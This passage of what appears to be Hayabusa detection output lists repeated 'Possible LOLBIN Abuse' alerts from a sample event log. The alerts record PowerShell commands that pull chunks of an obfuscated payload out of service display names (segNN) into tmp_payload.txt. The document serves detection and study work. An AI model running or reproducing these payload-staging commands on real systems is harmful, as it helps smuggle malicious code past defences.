Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:14.607 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:14.623 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:16.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:16.080 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:17.549 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:17.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:29.330 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:29.346 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb70 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:35.192 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:35.208 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:36.629 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:36.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:45.315 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa60 | User: FS03$ | LID: 